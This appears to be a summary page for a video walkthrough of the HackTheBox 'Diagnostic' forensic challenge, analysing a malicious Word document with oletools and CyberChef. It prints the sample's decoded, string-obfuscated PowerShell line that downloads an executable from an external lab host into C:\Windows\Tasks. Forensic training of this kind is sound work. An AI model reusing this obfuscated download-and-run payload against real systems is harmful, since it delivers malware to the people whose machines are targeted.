Microsoft Office Word Document Malware Analysis | HackTheBox Diagnostic

We covered analyzing a sample Microsoft office word document using oletools to extract relevant Macros and links. The sample document contaiend a link that references a webpage containg a Javascript code. The JS code contained a base64 encoded Powershell command that does a callout to an external domain to retrieve an executable file. This was part of HackTheBox Diagnostic forensic challenge.. This was part of HackTheBox Diagnostic. This was part of HackTheBox Diagnostic.

Offensive Security Certified Professional Study Notes and Guide

Video Highlights

• We used oleid and oleobj to analyze the word document named layoff.doc
• The document contaiend an external link which references a webpage that contaiend a Javascript
• We used the ASCII table to convert the char[58] and char[34] into their correspnding ASCII.
• We then used Cyberchef to convert the base64 and it converted to the below

${f`ile} = (“{7}{1}{6}{8}{5}{3}{2}{4}{0}”-f’}.exe’,’B{msDt_4s_A_pr0′,’E’,’r…s’,’3Ms_b4D’,’l3′,’toC’,’HT’,’0l_h4nD’)

&(“{1}{2}{0}{3}”-f’ues’,’Invoke’,’-WebReq’,’t’) (“{2}{8}{0}{4}{6}{5}{3}{1}{7}”-f ‘://au’,’.htb/2′,’h’,’ic’,’to’,’agnost’,’mation.di’,’/n.exe’,’ttps’) -OutFile “C:\Windows\Tasks\$file”

• We used powershell to decode the above into the challenge flag

Video Walkthrough